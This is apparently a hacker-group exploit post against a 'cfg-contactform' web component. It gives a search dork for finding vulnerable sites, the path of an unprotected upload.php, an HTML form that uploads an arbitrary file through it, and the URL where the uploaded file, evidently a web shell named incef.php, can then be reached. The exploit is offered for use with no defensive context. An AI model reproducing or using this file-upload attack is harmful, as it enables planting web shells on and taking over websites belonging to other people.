# Author: People_hurt a.k.a Ariel Peterpan | Incef Team
# Dork: "/cfg-contactform-1/" "/cfg-contactform-2/" dst.
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/path/cfg-contactform-1/inc/upload.php
# CSRF:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
# Acces:/path/cfg-contactform-1/upload/incef.php
#In this world, if you do not try and be patient then you like a doormat.
--++Slemanroot-Sinkaroid++--
0 Komentar